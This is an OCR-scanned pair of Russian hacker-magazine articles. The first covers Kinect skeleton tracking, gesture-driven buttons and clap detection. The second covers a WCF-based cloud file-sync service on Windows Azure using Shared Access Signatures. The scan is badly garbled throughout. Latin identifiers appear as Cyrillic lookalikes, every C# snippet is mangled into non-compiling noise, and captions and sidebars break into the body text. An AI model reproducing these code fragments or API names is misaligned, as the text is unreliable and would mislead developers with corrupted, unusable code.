Как следует из названия, метод Ога\л/ЗкеІе1оп 
отображает связанный скелет, а делает он это 
посредством вызовов других методов: бгаѵѵНеаб 
и бгаѵ»/Вопе. Первый метод на месте реальной 
человеческой головы рисует овал. Чтобы узнать 
координаты головы, метод единственным пара- 
метром получает «узел головы». В теле метода 
создается эллипс, и происходит инициализация 
его свойств. Но фактические координаты узла 
не могут быть использованы для рисования эл- 




ли пса. Поскольку от Кинекта программа получает 
координаты в трехмерном пространстве, но нам 
надо вывести эллипс на двумерную плоскость, 
то они некорректно его позиционируют. На по- 
мощь приходит метод ЗсаІеРозіІіоп. Он принима- 
ет ЗЭ- позицию узла, обернутую в объект класса 
ЗкеІеІопРоіпІ, и преобразует координаты из «про- 
странства скелета» в пространство глубины, ис- 
пользуя следующий оператор: 

0ер/ЫіІта§еРоіп1: сІерІіИРоіпі; = 

кіпесі: . СоогсІіпа'ЬеМаррег .±± 

МарЗкеІе'ЕопРоі п'ЬТоРер ѣНРоіп'Е*-' 

( БкеІе'ЬогРоіпІ : , Рер'ЫіІтаёерогта^ 

Ке501и~Ьіоп&4Ѳх48ѲРр53 Ѳ) ; . 

Методу МарЗкеІеІопРоіпІТоОерІІіРоіпІ пере- 
даются два параметра: собственно позиция узла 
и формат вывода потока глубины; для получения 
одинаковых координат с видеопотоком должно 
устанавливаться такое же разрешение. В завер- 
шение метод ЗсаІеРозіІіоп на основе координат 
пространства глубины формирует и возвраща- 
ет двумерную точку {объект Роіпі): гейлгп пе\л/ 
РоіпІ(сіерІИРоіпІ.Х, сІерІІіРоіпІ.У);. 

Второй метод — бгаѵѵВопе рисует кости 
и суставы, соединяющие их. Ему передаются 
два параметра — два узла — сустава, напри- 
мер: бгаѵѵВопе( 5 кеІеІоп.ЗоіпІ 5 |>ІоіпІТуре.НеасІ], 

зкеІеІоп.іоіпІ5[ЗоіпіТуре.ЗІюик1егСѳпІег]);. В теле 
этого метода создается линия — объект класса 
І_іпе, определяются ее цвет и ширина. С помо- 
щью двух вызовов функции ЗсаІеРозШоп воз- 
вращаются преобразованные координаты двух 
переданных суставов, они используются в каче- 
стве оконечных точек линии. Сами суставы выво- 
дятся в виде прямоугольников (объекты класса 
Весіапдіе). Четыре прямоугольника, находящие- 
ся на кистях и ступнях, выводятся красным цве- 
том, в отличие от всех остальных, закрашенных 
белым. Результат работы программы можно уви- 
деть на рис. 2. На нем также виден мой первый 
монитор, храню его как реликвию :}. 

Прежде чем мы перейдем к следующей теме, 
я скажу пару слов о том, как удобнее прогонять 
программу для теста. Конечно, неудобно каждый 
раз для тестирования подпрыгивать с кресла, та- 
бурета или на чем ты там сидишь. Как я упоминал 
в прошлой статье, для того чтобы записать после- 
довательность кадров с Кинекта, надо восполь- 
зоваться приложением Кіпесі ЗШсІіо, входящим 
в Кіпесі Іог ѴѴіпсІоѵѵз Тооікіі, начиная с версии 1 .5. 
Предположим, у тебя открыты подопытное при- 
ложение и Кіпесі Зіисііо, далее необходимо под- 
ключить одно к другому. Для этого нажми третью 
слева пиктограмму в тулбаре Кіпесі Зіисііо и в по- 
явившемся окне выбери имя подопытной про- 
ги, нажми Соппесі. Теперь, нажав пиктограмму 
ПесогсІ, можно начать запись данных входящих 
потоков. После остановки записи ее можно со- 
хранить, воспроизвести или пройтись по ней кадр 
за кадром. При этом воспроизведение будет осу- 
ществляться как в окнах Кіпесі Зіибіо, так и в тво- 
ей подключенной программе, следовательно, 
все эффекты, которые ты в нее добавил (в нашем 
случае рисование скелета), будут также отобра- 
жаться. 
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Рис. 3. Вот так Кіпесі Ризіоп воссоздает модель, 
сканируя целевой объект 

ПОСТРОЕНИЕ СОВРЕМЕННОГО СШ 

Кинект предоставляет возможности, которые 
можно использовать для дистанционного управ- 
ления информационными устройствами. Тем 
не менее еще не были созданы интерфейсы, 
управлять которыми с помощью Кинекта было 
бы удобно. Определенно, это фей л. Пока все 
еще правят бал клавиатура и мышь. Однако уже 
сейчас мы можем разрабатывать приложения 
с управлением через Кинект. Об этом я и хочу не- 
много поговорить. 

Как мы уже видели, мы можем прикрепить 
к определенному узлу скелета любой объ- 
ект, то есть рисовать его в тех же координатах, 
что сустав, и объект будет перемещаться в соот- 
ветствии с перемещениями данного узла. Пусть 
в нашем случае этим объектом служит изобра- 
жение. В нашем приложении оно будет играть 
роль курсора. Далее, на форме нужны элемен- 
ты 01)1, с которыми будет взаимодействовать 
юзер, используя наш курсор. Для этого подойдут 
стандартные элементы управления, пусть будут 
кнопки. И последний организационный вопрос: 
как осуществить взаимодействие со стандарт- 
ными элементами управления? Не мудрствуя 
лукаво, для обнаружения взаимодействия между 
изображением- курсором и кнопками, мы будем 
сравнивать их позиции. 

Наш журнал по-прежнему имеет ограничен- 
ный объем, поэтому, в связи со скорым исчер- 
панием свободного пространства, мне придется 
сильно ужаться и отсылать тебя к исходникам 
на диске еще чаще :). Итак, после того как соз- 
дано новое ѴѴРР-приложение, на форме пона- 
добятся канва и объект-изображение; в него мы 
будем выводить видеопоток с Кинекта, а канва 
нужна для вывода объекта-курсора (если посмо- 
треть на прилагаемые к проекту файлы, то можно 
увидеть, что он отображается в виде прицела). 
Растр прицела наложен на эллипс, который име- 
ет собственную форму, отдельную от формы 
с канвой. В выводе видеопотока уже нет ничего 
сложного — это мы проходили. Обработка дан- 
ных скелета точно такая же, как в предыдущем 
проекте, кроме заключения функции: там вместо 
вызова метода для рисования скелета сначала 



можнс 



и 




пип 



! ша 



к определе 



Ж ш Ш ■ А 




ое 



ШШШ і 
Г Я Я И Я 



ш 



ш г| л л 

г - 1 яшм я/і 






в ■ 



Гшяя Йшя 






пѳии 



Л І Мк Л 
I У Г І II 

щ 



г» 



& 



цен і 



анного ѵзла 



В МаіпѴѴіпсІоиѵ [ сэ | ЕЗ 




Рис. 4. Дистанционное воспроизведение звуков 
(Зѳаіесі Мойе) 

получается узел кисти правой руки, затем курсор 
устанавливается в координаты полученного узла, 
а потом вызываются функции опроса состояния 
каждой кнопки. Курсор является объектом клас- 
са НапсІСигзог и позиционируется посредством 
метода ЗеІРозіІіоп. Ему передаются объект Ки- 
некта и сустав. В его теле с использованием ме- 
тода МарЗкеІеІопРоіпІТоСоІогРоіпІ осуществля- 
ется преобразование координат из пространства 
скелета в пространство «цветных точек» (иными 
словами — видеопотока). Далее курсор позици- 
онируется на канве. Поскольку для целей проекта 
нужны нестандартные кнопки, для них заведен 
дополнительный класс СезІигеВиЧоп — наслед- 
ник класса ВиНоп. Поверх объекта Ітаде создай 
на форме шесть кнопок (или любое другое коли- 
чество). После создания нужного числа кнопок 
в ХАМІ_-редакторе измени их родительский класс 
(с ВиНоп на СезІигеВиНоп). По задумке, после 
нажатия каждой кнопки воспроизводится опре- 
деленный звук (см. проект КіиесіСопНоІСкИ). Все 
звуки представлены крохотными ѴѴАѴ-файлами. 
Звук проигрывается с помощью стандартного 
компонента МебіаЕІетепІ. При нажатии на кнопку 
задаем для его свойства Зоигсе путь к звуково- 
му файлу и вызываем метод Ріау. Метод опроса 
состояния кнопки — ѴаІісІаІеРозіІіоп является 
центральным местом приложения. Он получает 
объект-курсор. Первым действием получаются 
координаты курсора и текущей кнопки, которая 
проходит проверку. Далее в условном операторе 
сравниваются позиции этих объектов. Если по- 
зиция курсора совпала с кнопкой, тогда генери- 
руется событие (АсІіопЕпІгу), в котором сначала 
запустится проигрывание анимации (увеличение 
надписи на кнопке), а затем зарегистрируется со- 
бытие завершения анимации (еНесІзСотрІеІесі). 
Однако если анимация еще не завершена, 
а пользователь убрал курсор с кнопки, тогда воз- 
будится событие АсІіопЕхіІ, которое, во-первых, 
удалит регистрацию события ѳІІесІзСотріеІесІ, 
а во-вторых, начнет проигрывать свою анима- 
цию (уменьшение надписи). В том случае, если 
анимация увеличения надписи успешно дохо- 
дит до своего предела и вызывается событие 
еНесІзСотрІеІесІ, внутри его произойдет вызов 
события нажатия на соответствующую кнопку, 
запустится анимация уменьшения надписи и про- 
изойдет дерегистрация данного события (самого 
себя). Конечным результатом всего этого будет 
воспроизведение определенного звука — ответ 
на нажатие кнопки. 

Для проигрывания анимации мы использу- 
ем стандартную фичу ѴѴРР — ОоиЫеАпітаІіоп. 
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При создании эффекта-анимации конструктору 
передаются три параметра: начальное значение, 
конечное значение (для какого параметра и/или 
свойства, определяется позднее), третьим пара- 
метром передается длительность — объект клас- 
са Эигайоп, при создании получающий объект 
ТітеВрап — временной диапазон, задаваемый 
тремя значениями (часы, минуты, секунды). Из- 
меняемый параметр определяется во время вы- 
зова метода ВедіпАпітаііоп, объекта, для которо- 
го собирается проигрываться данная анимация; 
методу передаются два параметра: имя изменя- 
емого параметра и созданный на прошлом шаге 
эффект — объект ОоиЫѳАпітаііоп. 

ЖЕСТИКУЛЯЦИЯ 

В общении между людьми жесты играют значи- 
тельную роль; человек, видя какое-либо движе- 
ние собеседника, может (почти всегда) правильно 
распознать этот жест. При создании естественно- 
го пользовательского интерфейса (N1)1) встает 
задача дать машине способность распознавать 
жесты подобно человеку. Мы имеем сенсор с АРІ, 
значит, у нас есть возможность обучить этому ма- 
шину! 

Определение жестов — самая сложная за- 
дача при распознавании скелета посредством 
Кинекта, главным образом потому, что в КіпесІ 
ЗЭК отсутствуют какие-либо специальные АРІ 
для распознавания жестов, а это, в свою очередь, 
объясняется беспрерывным развитием данной 
области. Определенно, в будущих версиях Кіпесі 
ЗЭК разработчики получат удобные инструменты 
для распознавания жестов, но в данный момент, 
чтобы выполнить эту операцию, приходится за- 
ниматься хардкодингом, опираясь на координаты 
суставов. По сути, распознавание жестов имеет 
математический контекст, так как приходится ча- 
сто применять этот аппарат. 

Распознаваемые Кинектом жесты можно опре- 
делить в четыре группы: базовые, алгоритмиче- 
ские, взвешенные сети и шаблонные. Их названия 
определяются тем, как они представлены на бо- 
лее низком уровне, то есть любой жест можно 
декомпозировать — выделить его составляющие. 
Уже на основе этого определяются способы раз- 
работки методов детектирования жестов. Сегодня 
мы рассмотрим только базовые (тема достаточно 
объемна, а журнального места уже не осталось). 
Было бы забавно реализовать завершение рабо- 
ты ОС после того, как компьютеру показали фак 
(хай, Бивис!). Но это пока выходит за рамки статьи 
и технических возможностей, поскольку требует 
наличия распознающего пальцы сенсора. 

Мы ограничимся распознаванием хлопка, 
другими словами, соприкосновения рук. Это 
очень простой базовый жест, для распознава- 
ния которого достаточно определить расстояние 
между узлами. Чтобы его узнать, можно восполь- 
зоваться теоремой Пифагора о прямоугольном 
треугольнике. Объяснять тебе ее не буду, в школе 
должны были рассказать :). Если ты еще не доу- 
чился до седьмого класса, то респект тебе за чте- 
ние нашего журнала и Віпд в помощь! 

Продолжим с теми, кто в теме. В качестве ос- 
новы для нового приложения воспользуйся на- 
шей первой сегодняшней прогой — ВопезЭгаѵѵег. 
В нее осталось добавить только детектирование 
хлопка. Для этого в конце метода ОгаѵѵЗкеІеіоп 
добавь такой код: 

Яоаі: сіі зѣапсе ~ <-■ 

30іпШіз^апсе(5ке1е1:оп . Зоіпі:^ 

[Зоіпѣ Ту ре.НапсНе'РІ:] . зкеіеіюп.,*- 1 

ІоіпѣзГ ЗоіпііТуре. НапсІКіеНІ:] >1 



( еІіз'Еапсе < оІсЮІБІіапсе > 

0. Ш Р1ау_5оип<і ( ) ; 
оІсЮізііапсе = сіІ5І:апсе; 

Здесь с помощью функции фтЮізШпсе мы 
получаем расстояние между переданными в ка- 
честве параметров узлами, затем сравниваем 
полученное на текущем и предыдущем шагах зна- 
чения с 0,1 и, если текущее значение меньше этой 
константы, а предыдущее — больше, проигрыва- 
ем звук. В конце обновляем предыдущее значе- 
ние, заменяя его текущим. Знать предыдущую 
дистанцию нужно для того, чтобы детектировать 
хлопок лишь однажды, то есть если старая дис- 
танция приняла одинаковое с текущей дистанци- 
ей значение, меньшее 0,1, значит, хлопок уже был 
зафиксирован. И хотя руки по-прежнему вместе, 
повторно воспроизводить звук хлопка не надо, 
так как юзер еще не развел руки в стороны. 

Функция іоіпШізіапсе имеет следующий вид: 

ргіѵасе Поаі: і оіп'ЬРіЗ'ЕапсеПоіпІ: фгзі:., 
Зоіпѣ зесопоі) { 

•Поаі: сІХ = Ргзі: ._Ро5І1іоп .X - зесопсі . «-■ 
РозгЕіоп.Х; 

Поаі: сІУ = Пгзі: . Розііііоп .У - зесопсі .>-■ 
Ро5і~Еіоп. У; 

Поаі: 62 = Пгзі: . Розібіоп .2 - зесопсі .*-■ 
Розі'Ьіоп .2; 

Поаі: ѵаі = ( МоаіЖ аіФ. 5дг1:*-< 

((сіХЛбХ) + (сІУ ^ ФУ) + ( 62 . * СІ2П : 

геѣигп ѵаі; 

> 

В отличие от стандартной теоремы на плоскости, 
здесь добавлено третье измерение с соответ- 
ствующими вычислениями. 

Под конец раздела взглянем на другие группы 
жестов. Как мы видели, у базового типа только 
одно определяющее состояние, по достижении 
которого срабатывает триггер/событие. У алго- 
ритмического жеста имеется последовательность 
базовых действий, значит, чтобы сработал триг- 
гер, нужно выполнить всю последовательность 
в строгом порядке. В алгоритмическом жесте мо- 
гут участвовать более одного узла. Примером та- 
кого жеста может служить взмах рукой. Тип «взве- 
шенные сети» отличается от алгоритмического 
тем, что последовательность базовых действий 
нелинейна, на разных шагах она может иметь 
ответвления, но ключевые шаги должны присут- 
ствовать. Для иллюстрации примером прекрасно 
послужит обычный прыжок. Шаблонные жесты 
предполагают сравнение трюка, выполняемо- 
го юзером перед сенсором в текущий момент, 
с данными жеста, сохраненными в каком-либо 
источнике, им может быть, например, ХМІ_-файл 
или БД. Таким образом, происходит сравнение 
метаданных ключевых состояний. 

ЗАКЛЮЧЕНИЕ 

Сегодня, продолжив курс исследования Кинекта, 
мы рассмотрели одну из важнейших его функ- 
ций — обнаружение скелета и слежение за ним. 
Мы рассмотрели эту фичу в трех частях: соб- 
ственно распознавание скелета, детектирование 
его контрольных точек — суставов; дистанцион- 
ное управление программой с использованием 
естественного интерфейса; чтение жестов плюс 
реакция на них. Для каждой части имеется сэмпл 
для более ясного понимания теоретических прин- 
ципов и практических основ. Эти знания помогут 
тебе в разработке более сложных приложений, 
использующих Кинект. 

Удачи и до встречи на стран ицах Хакера! ІгЕ 




ШЕСТ РІІ8І0Ы 

ЗЭ-принтеры — модная и быстро 
развивающаяся тема. С их раз- 
витием возрастает и необходи- 
мость точной передачи данных 
ЗЭ-объектов реального мира в 
информационно-вычислительный 
комплекс для последующей об- 
работки и воссоздания. Именно 
для таких целей в КіпесІ Тог ѴѴіпбоѵѵз 
Тооікіі 1.7 добавлен новый компо- 
нент — Кіпесі Ризіоп. Его разра- 
ботка ведется уже несколько лет. В 
2011 году из секретных лабораторий 
МісгозоТІ Везеагсіі стали появляться 
первые публичные документы об 
этой технологии. На самом деле это 
не очень-то секретные лаборато- 
рии: исследованием и разработкой 
Кіпесі Ризіоп занимаются четыре 
английских университета плюс один 
канадский — в Торонто. 

Кіпесі Ризіоп позволяет сканиро- 
вать трехмерные объекты с по- 
мощью сенсора Кинекта. Иными 
словами, он позволяет воссоздать 
трехмерную модель реального 
объекта в электронно-цифровой 
среде. Главную (и единственную) 
роль в ЗЭ-сканировании играет 
поток глубины, на основе его 
данных строится модель. Эту 
модель впоследствии можно за- 
грузить в трехмерный редактор 
и привычным образом модифици- 
ровать. Для получения полностью 
трехмерной модели, не имеющей 
дыр, необходимо просканировать 
Кинектом целевой объект со всех 
сторон. Этого можно добиться, по- 
ворачивая объект каждой стороной, 
или, наоборот, если объект пред- 
ставляет собой сложное для пере- 
мещения/вращения тело, можно 
крутить сам Кинект. Сканирование 
выполняется в несколько проходов, 
поэтому, чтобы получить модель, 
Кинекту нужно некоторое время 
для полного распознавания объ- 
екта с каждой из сторон. В Кіпесі 
іог ѴѴіпсіоѵѵз Тооікіі 1 .7 входят 
полезные примеры использования 
данной технологии. С их помощью 
можно увидеть, как Кіпесі Ризіоп 
постепенно воссоздает модель, 
сканируя целевой объект (рис. 3). 
Кіпесі Ризіоп предъявляет довольно 
высокие требования к аппаратной 
части хост-машины, с помощью 
которой будет проводиться ска- 
нирование. Для интерактивного 
сканирования нужен компьютер 
с видеокартой, поддерживающей 
ОігесіХ 11, и многоядерный про- 
цессор с частотой 3 ГГц. Наконец- 
то все это имущество можно будет 
использовать для крутого дела, 
а не для игры в ЗЭ-шутеры :). 




Разрабатываем облачное файловое хранилище 

Облачные сервисы хранения данных сейчас не использует только ленивый. ОгорЬох, ЗкуОгіѵе, 
Віісаза... перечислить все не представляется возможным. Мы расскажем, как сделать 
на ѴѴіпсІоѵѵв Агиге файловое хранилище с небольшим количеством свистелок и плюшек. 



ВВЕДЕНИЕ В ѴѴШООѴѴ5 А21ІКЕ 

ѴѴіпсіоѵѵз Агиге — одна из платформ для реализации облачных сервисов. 
При разработке проекта из всего множества сервисов, предоставляемых 
Агиге, мы использовали только два: Арріісаііопз (среда выполнения приложе- 
ний) и ЭаШ Мападетепі (сервис хранения данных). 

Приложение, выполняемое в Аіиге, представляет собой облачный сер- 
вис. Существует три типа облачных сервисов (ролей): ѵѵогкег-роль, ѵѵеЬ-роль 
и ѵт-роль. ѴѴеЬ-роль обычно используется для создания веб- приложений, 
ѵѵогкег-роль — для выполнения длительных вычислений в фоновом режиме, 
ѵт-роль — образ операционной системы. 

В рамках одного проекта в облаке может взаимодействовать несколько 
экземпляров ѵѵеЬ- и ѵѵогкег- ролей. При этом для выполнения каждой роли 
выделяется отдельная виртуальная машина, которая создается при развер- 
тывании сервиса в облаке. 

Сервис хранения данных позволяет хранить объекты нескольких типов: 
таблицы (структурированное хранилище), бинарные объекты, очереди {ис- 
пользуются для обмена информацией между ролями), диски. 



СТРУКТУРА ПРОЕКТА 

В разработанный проект облачного файлового хранилища входит клиентское 
приложение и сервер, выполняющийся в облаке (в ѵѵогкег-роли). Для органи- 
зации взаимодействия клиента и сервера мы выбрали технологию ѴѴіпбоѵѵз 
Соттипісаііоп Роилбаііоп (ѴѴСР). Разработанный ѴѴСР-сервис реализует ду- 
плексный контракт, что позволяет клиенту и сервису обмениваться сообще- 
ниями, вызывая операции друг друга. Дуплексный контракт определяется 
в виде пары интерфейсов: 

1 . интерфейс от клиента к сервису (ІЗегѵісеОрегаІіопз — операции, которые 
клиент может вызывать на сервисе); 

2. интерфейс обратного вызова от сервиса к клиенту (ЮНепЮрегайопз — 
операции, которые сервис может вызывать на клиенте), см. атрибут 
ЗегѵісеСопІтасІ:. 

Атрибут ЗегѵісеВеИаѵіог описывает поведение сервиса. Значение пара- 
метра ІпзІапсеСопІехІМосІе устанавливает время жизни экземпляров серви- 
са, параметр СопсиггепсуМобе — степень параллелизма, то есть количество 
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запросов, которые могут быть одновременно направлены к одному экземпля- 
ру сервиса. Установленное сочетание параметров указывает, что создается 
один экземпляр сервиса, с которым параллельно может работать несколько 
потоков. Учитывая, что к сервису одновременно обращается несколько пото- 
ков, доступ к локальным переменным сервиса должен осуществляться с уче- 
том требований потокобезопасности. 

Описание поведения сервиса 

[5егѵі се ВеИаѵіог( 

Ірз'ЬапсеСоп’ЬехІіМосІе = Іп5І:апсеСап1:ех±Мос!е.5іпё]^ 
СопсиггепсуИосіе = СапсиггепсуМогіе.МиІІіірІе, 

ІпсІ исІеЕхсе р'Ьі опРе'Еаі І ІпРаиІ'Ев = . аізс . 

АсІсІге35Рі11:егМо(Ле = АсісІгеБзРіІ'ІіегМосІе.Апу) ] 

Описание контракта обратного вызова 

[5егѵісеСоп‘Ьгасѣ( 

СаІІЬаскСопІігасІ: = 1:уреоР(ІС1іеп'Ь0рега1:іоп5) Л 
5 е55ІопМосІе = Бе55іопМосіе. Кедиігесі) ] 




С Іои бВІоЬС Іі е пі ЬІоЬСІіепТ = 
5‘Еог а %еАссои п'Е . СгеаІіеСІоибВІоЬСІіепІ: ( ) ; 



Значение параметра ЗевзіопМобе указывает, что обмен сообщениями между 
клиентом и сервером — часть одного диалога (сеанса). 

Взаимодействие между клиентом и сервисом инициирует клиент, кото- 
рый вызывает на сервисе операцию Ведізіег. Эта операция отмечена атрибу- 
том ІзІпіТіаТіпд = ігие, это указывает на то, что только данная операция может 
начинать сеанс обмена сообщениями. 

Операция Ведізіег, в зависимости от переданных ей параметров, выпол- 
няет создание аккаунта пользователя на сервисе или регистрацию пользова- 
теля в списке клиентов. 

В сервисе для описания информации о подключенных клиентах (о сесси- 
ях) используется класс СІІепйпІогта'Ііоп, который включает следующие све- 
дения о клиенте: 

1 . Идентификатор сессии. 

2. Имя пользователя. 

3. Контракт обратного вызова. 

4. Уникальный хеш клиента. 

5. Имя файла, с которым клиент выполняет действие. 

Поскольку несколько клиентов могут выполнять чтение и обновление ин- 
формации о сессиях одновременно, для организации доступа к списку сес- 
сий используется класс ПеабегѴѴгіІегІ_оскЗІіпл. Данный класс предоставляет 
блокировку, которая позволяет организовать доступ к ресурсу таким обра- 
зом, что выполнять чтение могут одновременно несколько потоков, а моно- 
польно записывать — только один. Методы ЕпШгѴѴгіШ!_оск/ЕхіІ\Л/пІѳІ_оск 
выполняют вход в блокировку (выход из нее) в режиме записи, а методы 
Еп*егПеасіІ_оск/ЕхіШеасіІ_оск— в блокировке в режиме чтения. 

Хранение данных на сервере (в Агиге Зіогаде) мы организовали следую- 
щим образом: 

1 . Информация об учетных записях пользователей хранится в таблице изегз 
(вТаЫе Зіогаде). 

2. Файлы, закачиваемые клиентом, записываются в ВІоЬ Зіогаде. В ВІоЬ 
ЗФгаде хранение данных организовано в виде двух уровней: контейнер 
и блоб, причем в одном контейнере может храниться несколько блобов, 
каждый из которых должен иметь уникальное имя; в нашем проекте имя 
контейнера соответствует имени учетной записи пользователя, имя бло- 
ба — имени файла (каталога), который закачивается в блоб. 

ОРГАНИЗАЦИЯ ДОСТУПА КХРАНИЯИЩУ 

Клиент, выполняя синхронизацию каталога с облаком, взаимодействует с об- 
лачным хранилищем, для доступа к которому нужен ключ (ргітагу ассезз 
кеу). Хранить ключ в клиенте (даже применяя разные методики шифрования) 
небезопасно. Решение этой проблемы заключается в использовании техно- 
логии ЗПагеб Ассезз ЗідпаШгез (ЗАЗ). Она позволяет отделить код, который 
выполняет аутентификацию в хранилище, от кода, который выполняет управ- 
ление данными в хранилище. Таким образом, на стороне клиента работа 
с блоб-хранилищем выполняется без ключа. На рисунке показана схема об- 
ращения клиента к хранилищу. 

Аналогичным образом мы реализовали алгоритм регистрации пользова- 
теля на сервисе: доступ к хранилищу выполняется на стороне сервиса, кото- 
рый хранит ключ доступа. 

Создание ссылки на доступ к контейнеру 

[БесигіфуСгіѣісаІ] 

. иЫ.і . з'Ьгіпё бефУ.пк^оВ1оЬ_(5І:гіп§ изегМате л зѣгіпё ІіІеМате) { 

// Инициализация ссылки на аккаунт хранилища 

СІоибБ^ога^еАссоипІ: 5І:огаёеАссоип'Ь = 

СІоисІБІіогаёеАссоип'І:. РаГ5е(5І:ог‘а§еСоппес1:іоп5'1:гіпёХ« 



// Создание ссылки на контейнер, для которого буд ет 
// создана сигнатура распределенного доступа 

С1оисІВ1оЬСоп1:аіпег сопѣаіпегі = «-■ 

Ь1оЬС1іеп'Ь.6ефСоп'ЬаіпегРе‘Регепсе(и5егМате)^ 



// Создание контейнера 

сопТаіпе г . Сге аѣеІ-ЖоіЕх із'Е Г ) ; 



// Описание прав на доступ к контейнеру 

В1оЬСоп1аіпегРегтІ55іоп5 сопѣаіпегРегтІБЗіопз = _«_і 
пем В1оЬСогѵі:аіпегРептІ55Іоп5( ) ; 



// Установка свойства приватности контейнера. 

// контейнер недоступен в режиме анонимного доступа 

сопі:аіпегРегтІ55Іо.П5 . РиЬІісАссезз = *-■ 
ВІоЬСопѣаіпегРиЫісАссеззТѵре . 0 -РРі 



// Применение политик безопасности к контейнеру 

соп~Еаіпег .Зе1:РеггоІ55іоп5(соп1:аіпегРегтІ55Іоп5) ; 



// Создание ссылки на доступ к контейнеру 

5і:гіпй 5а 5 = соп~Еаілег .беѣБЬагегіАссеБзБійпаІиге Спе < -■ 
5Иагеф\ссе55Ро1ісу ( ){ 

// Установка времени активности ссылки 

БбагесІАссе55ЕхрігуТіте = Ра1:еТіте.ІП:сМоц.«-' 

Ас)с)Міпи1е5(ЗѲ ) , 

// Установка прав на доступ к контейнеру 

РегтІ55Іоп5 = БІіагесІАссе55Регті55Іоп5 . ЫгИе | ♦-» 

БМагес1Ассе55РегтІ5 5іоп5 . КеасІ | ^ 

БЬагесІАссе55РегтІ55Іоп5. РеІе’Ье | +-» 

БЬагес1Ассе55РегтІ55Іоп5. Изѣ 

Лі 

геі:игп 5а5; 



Рассмотрим алгоритмы, которые потребуются для реализации синхро- 
низации локального каталога и облачного хранилища. При разработке этих 



Один из возможных способов от- шт 

слеживать изменения в каталогах 

или файлах основан на использо- Сорцы ищи не на диске, 

вании класса РіІеЗузіетѴѴаІсМег. а на сайте. Просто мы 

Данный класс позволяет обраба- хотим тут кое-что при- 

тывать уведомления файловой чесать, голых женщин 

системы, возникающие при созда- добавить и поэтому 

нии, удалении, переименовании, в сроки сдачи диска 

изменении файлов (каталогов). точно не уложимся :) 
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ТРИАЛЬНЫЙ ДОСТУП к мт 

Бесплатный 90-дневный доступ к Аіиге можно получить, перейдя 
по ссылке зоо.дІ/іУІ Ж, Для регистрации потребуется банковская 
карта. Здесь зоо ді ЗХѲиС описан способ использования вирту- 
альной карты взамен реальной. 



алгоритмов мы учитывали, что одновременно к серверу в рамках одного ак- 
каунта может быть подключено несколько клиентов. 

ЗАГРУЗКА ФАЙЛ А В ОБЛАКО 

Процесс загрузки файла в облако состоит из двух шагов: определения воз- 
можности загрузки и собственно загрузки файла. 

В общем случае под одним аккаунтом на сервер могут зайти несколько 
клиентов (примем для определенности, что таких клиентов два: «Клиент А» 
и «Клиент Б»), В такой ситуации может возникнуть ошибка синхронизации 
загружаемых файлов. Допустим, оба клиента открыли локально один и тот 
же файл. После выполнения определенных действий «Клиент А» завершает 
работу с файлом и сохраняет его на диск. Код, отвечающий за мониторинг 
изменений файловой системы, обнаруживает изменение и загружает изме- 
ненный файл в облако. Однако в это же самое время «Клиент Б» продолжает 
редактировать тот же файл. Поэтому, если не предусмотреть описанную си- 
туацию, один из клиентов может потерять данные. 

Реализованный способ разрешения описанного конфликта выглядит сле- 
дующим образом. Клиент, загружающий файл, должен с помощью сервиса 
обратиться к другим клиентам, выполняющимся в рамках того же аккаунта 
(если такие клиенты вообще есть), и определить, доступен ли в их локальном 
каталоге на запись файл , который он пытается загрузить: 

* если доступ есть — файл загружается в хранилище; 

• если доступа нет — файл загружается в хранилище с другим именем: 
<имя_файла>_<хеш_клиента>. расширение. 

Описанный подход позволяет сохранить копии файла, созданные на каж- 
дом клиенте. Данный подход можно использовать при разрешении конфлик- 
тов для любого количества клиентов в рамках одного аккаунта. 

Процесс загрузки файла в облако состоит из двух шагов. 

1 . Загрузка файла в блоб, имя которого формируется с помощью префикса 
ІІРО и имени файла; 

Загрузка файла в облако 

иы' . г а (ѵаг -(ЦеБ^геат = Бу5~Ьет. 10. Рі1е.0репКеасІ(Ф1еМате) ) { 
ЫоЬ. Ур1оасІРгот5ігеат(1і1е5'^геат)^ 

} - 

2. Переименование блоба после окончания загрузки (из имени блоба удаля- 
ется префикс ІІРО_). 

В ѴѴіпсіоѵѵз Агиге не реализован алгоритм переименования блоба, в связи 
с этим операция его переименования состоит из двух шагов: копирование су- 
ществующего блоба в блоб с новым именем и удаление старого блоба (еще 
пара блобов в этом предложении — и мой мозг бы взорвался. — Прим. ред.). 

Переименование блоба 

СІоисІВІоЬ ехізііВІоЬ - сопіаіпег .СеЬВІоЬКе-РегепсеСпапчезГѲ І ) ; 
СІоисІВІоЬ пемВІоЬ = сопі:аіпег.Се±В1оЬВе-Регепсе(пате5[1] ); 



// Копирование блоба 

пеыВ1оЬ.СорѵРготВ1оЬ(ехІ5іВ1оЬ) ; 



// Удаление блоба 

ехІ5±В1оЬ . 0е1еіе ( ) ; 



ГРАНТ ОТ МАЙКРОСОФТ 

Майкрософт предоставляет для образовательных учреждений грант 
на получение бесплатного доступа к ѴѴіпсіоѵѵз Агиге. Для этого нужно 
перейти по ссылке аоо.аІ/186РЦ и заполнить небольшую анкету. 



Описанный процесс позволяет создать защиту от ошибок, которые могут 
произойти при загрузке файла в облако, поскольку в рассматриваемом алго- 
ритме загрузка считается завершенной только после того, как из имени бло- 
ба будет удален префикс ЫРО_. 

При загрузке файла в блоб учитывается, что в хранилище может находить- 
ся блоб с таким же именем, но помеченный на удаление. Поэтому блоб, по- 
меченный на удаление, перед закачкой файла в облако нужно будет удалить. 

ЛОГ ОПЕРАЦИЙ 

Клиент, загрузив или удалив файл из облака, должен сообщить об этом дру- 
гим клиентам. Для этого создаётся лог операций. Хранится лог в таблице, 
которая размещается в Агиге 8(Э1_ ОаІаВазе. Структура таблицы содержит ин- 
формацию о клиенте, который выполнил операцию, объекте операции, а так- 
же служебную информацию. 

ВЫ ГРУЗКА ДАННЫХ ИЗ ОБЛАКА 

Алгоритм выгрузки из облака на диск разработан с учетом того, что до вы- 
грузки необходимо создать структуру каталогов для хранения файлов. 

Выгрузка файла на диск 

Ц5іп§ (уаг ІіІеБІігеат = Бузует. 10. Рі1е,0регіИгіі:е(іі1епате) ) { 
ЫоЬ_. Вомп1оасІТо5ігеат(1і1е51:геат)і 

} 

СРАВНЕНИЕ СОДЕРЖИМОГО ДИСКАМ ОБЛАКА 

Периодически сравнивая (с помощью таймера) содержимое синхронизиру- 
емого каталога и облачного хранилища, клиентское приложение генерирует 
четыре списка файлов (каталогов): 

1 . файлы (каталоги), которые нужно удалить с диска (данные файлы помече- 
ны в облаке флагом удаления); 

2. файлы (каталоги), которые нужно удалить из облака (файлы такого типа 
отсутствуют на диске, но присутствуют в облаке); 

3. файлы (каталоги) для загрузки в облако (дата последнего изменения фай- 
